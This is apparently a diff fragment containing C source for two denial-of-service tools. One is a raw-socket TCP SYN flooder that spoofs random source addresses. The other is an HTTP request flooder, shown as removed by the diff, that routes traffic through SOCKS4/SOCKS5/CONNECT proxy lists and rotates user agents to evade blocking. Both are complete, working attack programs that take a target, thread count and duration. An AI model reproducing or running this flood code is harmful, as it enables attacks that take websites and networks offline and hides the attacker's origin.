#include <netdb.h>
|
|
||||||
#include <net/if.h>
|
|
||||||
#include <arpa/inet.h>
|
|
||||||
|
|
||||||
#define MAX_PACKET_SIZE 4096
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
|
|
||||||
static unsigned long int Q[4096], c = 362436;
|
|
||||||
static unsigned int floodport;
|
|
||||||
volatile int limiter;
|
|
||||||
volatile unsigned int pps;
|
|
||||||
volatile unsigned int sleeptime = 100;
|
|
||||||
|
|
||||||
void init_rand(unsigned long int x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
|
||||||
}
|
|
||||||
unsigned long int rand_cmwc(void)
|
|
||||||
{
|
|
||||||
unsigned long long int t, a = 18782LL;
|
|
||||||
static unsigned long int i = 4095;
|
|
||||||
unsigned long int x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int count)
|
|
||||||
{
|
|
||||||
register unsigned long sum = 0;
|
|
||||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
|
||||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
|
||||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
|
|
||||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
|
||||||
|
|
||||||
struct tcp_pseudo
|
|
||||||
{
|
|
||||||
unsigned long src_addr;
|
|
||||||
unsigned long dst_addr;
|
|
||||||
unsigned char zero;
|
|
||||||
unsigned char proto;
|
|
||||||
unsigned short length;
|
|
||||||
} pseudohead;
|
|
||||||
unsigned short total_len = iph->tot_len;
|
|
||||||
pseudohead.src_addr=iph->saddr;
|
|
||||||
pseudohead.dst_addr=iph->daddr;
|
|
||||||
pseudohead.zero=0;
|
|
||||||
pseudohead.proto=IPPROTO_TCP;
|
|
||||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
|
||||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
|
||||||
unsigned short *tcp = malloc(totaltcp_len);
|
|
||||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
|
||||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
|
||||||
unsigned short output = csum(tcp,totaltcp_len);
|
|
||||||
free(tcp);
|
|
||||||
return output;
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
|
||||||
iph->id = htonl(54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = 6;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr("192.168.3.100");
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_tcp_header(struct tcphdr *tcph)
|
|
||||||
{
|
|
||||||
tcph->source = htons(5678);
|
|
||||||
tcph->seq = rand();
|
|
||||||
tcph->ack_seq = 1;
|
|
||||||
tcph->res2 = 1;
|
|
||||||
tcph->doff = 5;
|
|
||||||
tcph->syn = 1;
|
|
||||||
tcph->window = htons(65535);
|
|
||||||
tcph->check = 1;
|
|
||||||
tcph->urg_ptr = 1;
|
|
||||||
}
|
|
||||||
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
char *td = (char *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
|
||||||
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = htons(floodport);
|
|
||||||
sin.sin_addr.s_addr = inet_addr(td);
|
|
||||||
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "Could not open raw socket.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_tcp_header(tcph);
|
|
||||||
|
|
||||||
tcph->dest = htons(floodport);
|
|
||||||
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
init_rand(time(NULL));
|
|
||||||
register unsigned int i;
|
|
||||||
i = 0;
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
|
|
||||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
|
||||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
|
||||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->check = tcpcsum(iph, tcph);
|
|
||||||
|
|
||||||
pps++;
|
|
||||||
if(i >= limiter)
|
|
||||||
{
|
|
||||||
i = 0;
|
|
||||||
usleep(sleeptime);
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 6){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
fprintf(stdout, "Setting up Sockets...\n");
|
|
||||||
|
|
||||||
int num_threads = atoi(argv[3]);
|
|
||||||
floodport = atoi(argv[2]);
|
|
||||||
int maxpps = atoi(argv[4]);
|
|
||||||
limiter = 0;
|
|
||||||
pps = 0;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
|
|
||||||
int multiplier = 20;
|
|
||||||
|
|
||||||
int i;
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Starting Flood...\n");
|
|
||||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
|
||||||
{
|
|
||||||
usleep((1000/multiplier)*1000);
|
|
||||||
if((pps*multiplier) > maxpps)
|
|
||||||
{
|
|
||||||
if(1 > limiter)
|
|
||||||
{
|
|
||||||
sleeptime+=100;
|
|
||||||
} else {
|
|
||||||
limiter--;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
limiter++;
|
|
||||||
if(sleeptime > 25)
|
|
||||||
{
|
|
||||||
sleeptime-=25;
|
|
||||||
} else {
|
|
||||||
sleeptime = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
pps = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
@ -1,598 +0,0 @@
|
|||||||
#include <pthread.h>
|
|
||||||
#include <sys/resource.h>
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <signal.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/tcp.h>
|
|
||||||
#include <netdb.h>
|
|
||||||
#include <netinet/in.h>
|
|
||||||
#include <ctype.h>
|
|
||||||
|
|
||||||
#define RND_CHAR (char)((rand() % 26)+97)
|
|
||||||
|
|
||||||
char *useragents[] = {
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0 RestSharp 102.0.0.0",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36",
|
|
||||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
|
|
||||||
"Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
|
||||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
|
|
||||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.2.15 Version/10.00",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; )",
|
|
||||||
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12",
|
|
||||||
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
|
||||||
"Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
|
|
||||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.5) Gecko/2009021916 Songbird/1.1.2 (20090331142126)",
|
|
||||||
"Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
|
|
||||||
"Mozilla/5.0 (X11; U; Linux; cs-CZ) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) rekonq",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows XP 5.1) Lobo/0.98.4",
|
|
||||||
"X-Smiles/1.2-20081113",
|
|
||||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008120120 Blackbird/0.9991",
|
|
||||||
"Mozilla/5.0 (SCH-F859/F859DG12;U;NUCLEUS/2.1;Profile/MIDP-2.1 Configuration/CLDC-1.1;480*800;CTC/2.0) Dolfin/2.0",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
|
|
||||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Conkeror/0.9.3",
|
|
||||||
"LeechCraft (X11; U; Linux; ru_RU) (LeechCraft/Poshuku 0.3.55-324-g9365f23; WebKit 4.5.2/4.5.2)",
|
|
||||||
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.8) Gecko/20100317 Postbox/1.1.3",
|
|
||||||
"xine/1.1.16.3",
|
|
||||||
"Bunjalloo/0.7.6(Nintendo DS;U;en)",
|
|
||||||
"Mozilla/5.0 (X11; U; Linux i686; en-US; SkipStone 0.8.3) Gecko/20020615 Debian/1.0.0-3 ",
|
|
||||||
"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
|
|
||||||
"MMozilla/5.0 (Windows; U; Windows NT 6.1; cs-CZ) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.1.5 Safari/533.3",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
|
|
||||||
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
|
|
||||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
|
||||||
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
|
|
||||||
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
|
|
||||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
};
|
|
||||||
#define ATTACKPORT 80
|
|
||||||
char *postformat = "%s /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: #useragent#\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\n%s\r\n%s";
|
|
||||||
char *postpayload;
|
|
||||||
struct urlparts {
|
|
||||||
char * name;
|
|
||||||
char separator[4];
|
|
||||||
char value[128];
|
|
||||||
} parts[] = {
|
|
||||||
{ "scheme", ":" },
|
|
||||||
{ "userid", "@" },
|
|
||||||
{ "password", ":" },
|
|
||||||
{ "host", "//" },
|
|
||||||
{ "port", ":" },
|
|
||||||
{ "path", "/" },
|
|
||||||
{ "param", ";" },
|
|
||||||
/*{ "query", "?" },*/
|
|
||||||
{ "fragment", "#" }
|
|
||||||
};
|
|
||||||
enum partnames { scheme = 0, userid, password, host, port, path, param, query, fragment } ;
|
|
||||||
#define NUMPARTS (sizeof parts / sizeof (struct urlparts))
|
|
||||||
struct urlparts *returnparts[8];
|
|
||||||
struct urllist { char *url; int done; struct urllist *next; struct urllist *prev; };
|
|
||||||
struct proxy { char *type; char *ip; int port; int working; };
|
|
||||||
struct list { struct proxy *data; char *useragent; struct list *next; struct list *prev; };
|
|
||||||
struct list *head = NULL;
|
|
||||||
char parseError[128];
|
|
||||||
int parseURL(char *url, struct urlparts **returnpart);
|
|
||||||
char * strsplit(char * s, char * tok);
|
|
||||||
char firstpunc(char *s);
|
|
||||||
int strleft(char * s, int n);
|
|
||||||
void setupparts();
|
|
||||||
void freeparts();
|
|
||||||
char *stristr(const char *String, const char *Pattern);
|
|
||||||
char *str_replace(char *orig, char *rep, char *with);
|
|
||||||
char *geturl(char *url, char *useragent, char *ip);
|
|
||||||
char *ipstr;
|
|
||||||
static int rps = 0;
|
|
||||||
|
|
||||||
void *flood(void *par) {
|
|
||||||
struct list *startpoint = (struct list *)par;
|
|
||||||
int i;
|
|
||||||
struct sockaddr_in serverAddr;
|
|
||||||
signal(SIGPIPE, SIG_IGN);
|
|
||||||
while(1)
|
|
||||||
{
|
|
||||||
int sent = 0;
|
|
||||||
if(startpoint->data->working == 0)
|
|
||||||
{
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
sleep(1);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
|
|
||||||
memset(&serverAddr, 0, sizeof(serverAddr));
|
|
||||||
serverAddr.sin_family = AF_INET;
|
|
||||||
serverAddr.sin_port = htons(startpoint->data->port);
|
|
||||||
serverAddr.sin_addr.s_addr = inet_addr(startpoint->data->ip);
|
|
||||||
int serverSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
|
|
||||||
u_int yes=1;
|
|
||||||
if (setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes)) < 0) {}
|
|
||||||
if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
|
|
||||||
{
|
|
||||||
startpoint->data->working = 0;
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
if(strcmp(startpoint->data->type, "Socks4")==0)
|
|
||||||
{
|
|
||||||
unsigned char buf[10];
|
|
||||||
buf[0] = 0x04;
|
|
||||||
buf[1] = 0x01;
|
|
||||||
*(unsigned short*)&buf[2] = htons(ATTACKPORT);
|
|
||||||
*(unsigned long*)&buf[4] = inet_addr(ipstr);
|
|
||||||
buf[8] = 0x00;
|
|
||||||
if(send(serverSocket, buf, 9, MSG_NOSIGNAL) != 9)
|
|
||||||
{
|
|
||||||
startpoint->data->working = 0;
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
close(serverSocket);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if(strcmp(startpoint->data->type, "Socks5")==0)
|
|
||||||
{
|
|
||||||
unsigned char buf[20];
|
|
||||||
buf[0] = 0x05;
|
|
||||||
buf[1] = 0x01;
|
|
||||||
buf[2] = 0x00;
|
|
||||||
if((sent = send(serverSocket, buf, 3, MSG_NOSIGNAL)) < 0)
|
|
||||||
{
|
|
||||||
startpoint->data->working = 0;
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
close(serverSocket);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
buf[0] = 0x05;
|
|
||||||
buf[1] = 0x01;
|
|
||||||
buf[2] = 0x00;
|
|
||||||
buf[3] = 0x01;
|
|
||||||
*(unsigned long*)&buf[4] = inet_addr(ipstr);
|
|
||||||
*(unsigned short*)&buf[8] = htons(ATTACKPORT);
|
|
||||||
if((sent = send(serverSocket, buf, 10, MSG_NOSIGNAL)) < 0)
|
|
||||||
{
|
|
||||||
startpoint->data->working = 0;
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
close(serverSocket);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if(strcmp(startpoint->data->type, "CONNECT") == 0 || strcmp(startpoint->data->type, "TUNNEL") == 0)
|
|
||||||
{
|
|
||||||
char *connectrequest = malloc(1024);
|
|
||||||
bzero(connectrequest, 1024);
|
|
||||||
sprintf(connectrequest, "CONNECT %s:25565 HTTP/1.0\r\n\r\n", ipstr);
|
|
||||||
if((sent = send(serverSocket, connectrequest, strlen(connectrequest), MSG_NOSIGNAL)) < 0)
|
|
||||||
{
|
|
||||||
startpoint->data->working = 0;
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
close(serverSocket);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
char *recvbuf = malloc(1024);
|
|
||||||
bzero(recvbuf, 1024);
|
|
||||||
int gotbytes = recv(serverSocket, recvbuf, 1024, 0);
|
|
||||||
if(gotbytes < 1)
|
|
||||||
{
|
|
||||||
startpoint->data->working = 0;
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
close(serverSocket);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
free(recvbuf);
|
|
||||||
}
|
|
||||||
char *httppayload = str_replace(postpayload, "#useragent#", startpoint->useragent);
|
|
||||||
if(httppayload == NULL)
|
|
||||||
{
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
close(serverSocket);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
char *tmp = NULL;
|
|
||||||
while((tmp = strstr(httppayload, "%RANDOM%"))!=NULL)
|
|
||||||
{
|
|
||||||
*(tmp) = RND_CHAR;
|
|
||||||
*(tmp+1) = RND_CHAR;
|
|
||||||
*(tmp+2) = RND_CHAR;
|
|
||||||
*(tmp+3) = RND_CHAR;
|
|
||||||
*(tmp+4) = RND_CHAR;
|
|
||||||
*(tmp+5) = RND_CHAR;
|
|
||||||
*(tmp+6) = RND_CHAR;
|
|
||||||
*(tmp+7) = RND_CHAR;
|
|
||||||
}
|
|
||||||
send(serverSocket, httppayload, strlen(httppayload), MSG_NOSIGNAL);
|
|
||||||
free(httppayload);
|
|
||||||
close(serverSocket);
|
|
||||||
rps++;
|
|
||||||
usleep(50000);
|
|
||||||
//startpoint = startpoint->next;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
int main(int argc, char *argv[ ]) {
|
|
||||||
if(argc < 6){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
//fprintf(stdout, "Setting up Sockets...\n");
|
|
||||||
int num_threads = atoi(argv[3]);
|
|
||||||
char *method = argv[2];
|
|
||||||
if(!(strcmp(method, "GET")==0 || strcmp(method, "HEAD")==0|| strcmp(method, "POST")==0))
|
|
||||||
{
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
FILE *pFile = fopen(argv[4], "rb");
|
|
||||||
if(pFile==NULL)
|
|
||||||
{
|
|
||||||
perror("fopen"); exit(1);
|
|
||||||
}
|
|
||||||
fseek(pFile, 0, SEEK_END);
|
|
||||||
long lSize = ftell(pFile);
|
|
||||||
rewind(pFile);
|
|
||||||
char *buffer = (char *)malloc(lSize*sizeof(char));
|
|
||||||
fread(buffer, 1, lSize, pFile);
|
|
||||||
fclose (pFile);
|
|
||||||
int i=0;
|
|
||||||
char *pch = (char *)strtok(buffer, ":");
|
|
||||||
while(pch != NULL)
|
|
||||||
{
|
|
||||||
if(head == NULL)
|
|
||||||
{
|
|
||||||
head = (struct list *)malloc(sizeof(struct list));
|
|
||||||
bzero(head, sizeof(struct list));
|
|
||||||
head->data = (struct proxy *)malloc(sizeof(struct proxy));
|
|
||||||
bzero(head->data, sizeof(struct proxy));
|
|
||||||
head->data->working = 1;
|
|
||||||
head->data->ip = malloc(strlen(pch)+1); strcpy(head->data->ip, pch);
|
|
||||||
pch = (char *)strtok(NULL, ":");
|
|
||||||
if(pch == NULL) exit(-1);
|
|
||||||
head->data->port = atoi(pch);
|
|
||||||
pch = (char *)strtok(NULL, ":");
|
|
||||||
head->data->type = malloc(strlen(pch)+1); strcpy(head->data->type, pch);
|
|
||||||
pch = (char *)strtok(NULL, ":");
|
|
||||||
head->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
|
|
||||||
head->next = head;
|
|
||||||
head->prev = head;
|
|
||||||
} else {
|
|
||||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
|
||||||
bzero(new_node, sizeof(struct list));
|
|
||||||
new_node->data = (struct proxy *)malloc(sizeof(struct proxy));
|
|
||||||
bzero(new_node->data, sizeof(struct proxy));
|
|
||||||
new_node->data->working = 1;
|
|
||||||
new_node->data->ip = malloc(strlen(pch)+1); strcpy(new_node->data->ip, pch);
|
|
||||||
pch = (char *)strtok(NULL, ":");
|
|
||||||
if(pch == NULL) break;
|
|
||||||
new_node->data->port = atoi(pch);
|
|
||||||
pch = (char *)strtok(NULL, ":");
|
|
||||||
new_node->data->type = malloc(strlen(pch)+1); strcpy(new_node->data->type, pch);
|
|
||||||
pch = (char *)strtok(NULL, ":");
|
|
||||||
new_node->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
|
|
||||||
new_node->prev = head;
|
|
||||||
new_node->next = head->next;
|
|
||||||
head->next = new_node;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
free(buffer);
|
|
||||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
|
||||||
struct rlimit rl;
|
|
||||||
int result;
|
|
||||||
rl.rlim_cur = kOpenFD;
|
|
||||||
rl.rlim_max = kOpenFD;
|
|
||||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
|
||||||
if (result != 0)
|
|
||||||
{
|
|
||||||
perror("setrlimit");
|
|
||||||
fprintf(stderr, "setrlimit returned result = %d\n", result);
|
|
||||||
}
|
|
||||||
bzero(&rl, sizeof(struct rlimit));
|
|
||||||
rl.rlim_cur = 256 * 1024;
|
|
||||||
rl.rlim_max = 4096 * 1024;
|
|
||||||
result = setrlimit(RLIMIT_STACK, &rl);
|
|
||||||
if (result != 0)
|
|
||||||
{
|
|
||||||
perror("setrlimit_stack");
|
|
||||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
|
||||||
}
|
|
||||||
setupparts();
|
|
||||||
parseURL(argv[1], returnparts);
|
|
||||||
if(argc > 6 && !(strcmp(argv[6], "0") == 0))
|
|
||||||
{
|
|
||||||
ipstr = malloc(strlen(argv[6])+1);
|
|
||||||
bzero(ipstr, strlen(argv[6])+1);
|
|
||||||
strcpy(ipstr, argv[6]);
|
|
||||||
//fprintf(stdout, "Using manual IP...\n");
|
|
||||||
} else {
|
|
||||||
struct hostent *he;
|
|
||||||
struct in_addr a;
|
|
||||||
he = gethostbyname(returnparts[host]->value);
|
|
||||||
if (he)
|
|
||||||
{
|
|
||||||
while (*he->h_addr_list)
|
|
||||||
{
|
|
||||||
bcopy(*he->h_addr_list++, (char *) &a, sizeof(a));
|
|
||||||
ipstr = malloc(INET_ADDRSTRLEN+1);
|
|
||||||
inet_ntop (AF_INET, &a, ipstr, INET_ADDRSTRLEN);
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{ herror("gethostbyname"); }
|
|
||||||
}
|
|
||||||
char *postdata = malloc(1);
|
|
||||||
bzero(postdata, 1);
|
|
||||||
char *extrahead = malloc(1);
|
|
||||||
bzero(extrahead, 1);
|
|
||||||
if(argc > 7)
|
|
||||||
{
|
|
||||||
//fprintf(stdout, "Using post parameters\n");
|
|
||||||
postdata = argv[7];
|
|
||||||
extrahead = malloc(4096);
|
|
||||||
bzero(extrahead, 4096);
|
|
||||||
sprintf(extrahead, "Content-Length: %d\r\nContent-Type: application/x-www-form-urlencoded\r\n", strlen(postdata));
|
|
||||||
}
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
postpayload = malloc(4096);
|
|
||||||
sprintf(postpayload, postformat, method, returnparts[path]->value, returnparts[host]->value, extrahead, postdata);
|
|
||||||
freeparts();
|
|
||||||
|
|
||||||
//fprintf(stdout, "Starting Flood...\n");
|
|
||||||
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create(&thread[i], NULL, &flood, (void *)head);
|
|
||||||
pthread_detach(thread[i]);
|
|
||||||
head = head->next;
|
|
||||||
head = head->next;
|
|
||||||
head = head->next;
|
|
||||||
head = head->next;
|
|
||||||
head = head->next;
|
|
||||||
}
|
|
||||||
|
|
||||||
int temp = atoi(argv[5]);
|
|
||||||
|
|
||||||
for(i = 0;i<temp;i++)
|
|
||||||
{
|
|
||||||
sleep(1);
|
|
||||||
//printf("R/s: %d\n", rps);
|
|
||||||
//rps = 0;
|
|
||||||
}
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
void freeparts()
|
|
||||||
{
|
|
||||||
return;
|
|
||||||
